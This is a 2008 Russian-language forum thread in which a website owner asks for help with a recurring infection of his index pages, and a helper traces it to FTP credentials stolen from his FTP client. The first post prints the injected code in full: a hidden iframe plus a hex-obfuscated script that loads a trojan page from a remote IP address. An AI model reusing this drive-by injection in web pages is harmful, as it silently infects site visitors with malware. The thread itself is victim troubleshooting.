Предыдущая тема :: Следующая тема |
Автор |
Сообщение |
Romankin Новый посетитель
Зарегистрирован: 08.06.2005 Сообщения: 7 Откуда: Харьков
|
Добавлено: Сб Фев 16, 2008 16:10 Заголовок сообщения: Прицепился вирус на сайты. Убить никак не могу. Хелп короче! |
|
|
Вобщем товарищи херня какая-то поцепилась ко мне на сайты которые хотятся на домене.ком.уа.
Приписывает к файлу index вот такую фигню:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47b6c2 c0281b4(v47b6c2c0285ae){ function v47b6c2c0289aa () {return 16;} return(parseInt(v47b6c2c0 285ae,v47b6c2c0 289aa()));}function v47b6c2c0 291b9(v47b6c2c0295b4){ function v47b6c2c02a1a8 () {return 2;} var v47b6c2c 0299af='';for(v47b6c2c029dac=0; v47b6 c2c029dac<v47b6c2 c0295b4.length; v47b6c2c 029dac+=v47b6 c2c0 2a1a8()){ v47b6c2c0299af+=(String.fro mCharCode(v47b6c2 c0281b4(v47b6 c2c0295b4.substr(v47b6c2c029dac, v47b6c2 c02a1a8()))));}return v47b6c2 c0299af;} docum ent.write(v47b6c2c0291b9('3C5343524950543E77 696E646F772E7374617 475733D27446F6E6527 3B646F63756D656E7 42E777269746528273 C696672616D65206E 616D653D376562393 661633737207372633 D5C27687474703A2F2 F37372E 3232312E3133 332E3138382F2E69662F 676F2E68746D6C3F27 2B4D6174682E726F756E64284D6 174682E72616E646F6D28292A323830343 136292B2737623164366137645C2 72077696474683D37333620686569676 8743D333831207374796C653 D5C27646973706 C61793A206E6F6E655C27 3E3C2F696672 616D653E27293C2F5343524 950543E'));</script>
После чего при заходе на мой сайт в комп упорно с http://77.221.133.188/.if/ лезет троян.
Когда ручками вырезаю этот код то он появляется через 10-15 минут снова.
Прочесал свою машину вдоль и поперек разными антивирусниками на предмет наличия вирусов - нету! Удалил все куки и файлы.
Прочесал все файлы на сайтах, вручную вырезал этот вредоносный код, сменил пароль на хостинге! Нигде пароль не сохранял.
Проходит день-два и снова появляется этот код!!!!!!!
Я уже не знаю чё делать!!!!!!! Хелп ми плизззззз! _________________ Я не грустный - я спокойный! |
|
Вернуться к началу |
|
|
Romankin Новый посетитель
Зарегистрирован: 08.06.2005 Сообщения: 7 Откуда: Харьков
|
Добавлено: Сб Фев 16, 2008 17:56 Заголовок сообщения: |
|
|
Поставил каспера.
Он нашел ntos.exe
Убил.
Может то он виноват был в похищении паролей? _________________ Я не грустный - я спокойный! |
|
Вернуться к началу |
|
|
Алексей Помогу чем смогу
Зарегистрирован: 03.10.2003 Сообщения: 2133 Откуда: Украина, Харьков
|
Добавлено: Сб Фев 16, 2008 19:49 Заголовок сообщения: |
|
|
Вполне вероятно.
Есть ещё прекрасный топик на тему хищения паролей, можно там что-то почерпнуть... _________________ С уважением,
Алексей. |
|
Вернуться к началу |
|
|
Romankin Новый посетитель
Зарегистрирован: 08.06.2005 Сообщения: 7 Откуда: Харьков
|
Добавлено: Сб Фев 16, 2008 21:44 Заголовок сообщения: |
|
|
Да я начитаный.
И заплатки ставлю и антивирус стоял ( он трояна видит и блокирует но первопричину не находил ) и паролей никогда не сохраняю кроме входа на фтп, а всё таки пролезла зараза! А теперь убить пытаюсь неделю уже.
Вобщем надеюсь нашел его. Буду проверить пару дней. _________________ Я не грустный - я спокойный! |
|
Вернуться к началу |
|
|
Алексей Помогу чем смогу
Зарегистрирован: 03.10.2003 Сообщения: 2133 Откуда: Украина, Харьков
|
Добавлено: Сб Фев 16, 2008 22:25 Заголовок сообщения: |
|
|
Romankin писал(а): | и паролей никогда не сохраняю кроме входа на фтп, а всё таки пролезла зараза! |
Так именно здесь и "пролезла" и ещё раз "пролезет".
Не сохраняйте пароли на FTP в FTP-клиенте - вирус их оттуда получает, роботом заходит на Ваш FTP от Вашего имени и меняет там что ему нужно.
Пароли смените, выберите их сложными и держите их только в голове - это единственное решение. _________________ С уважением,
Алексей. |
|
Вернуться к началу |
|
|
|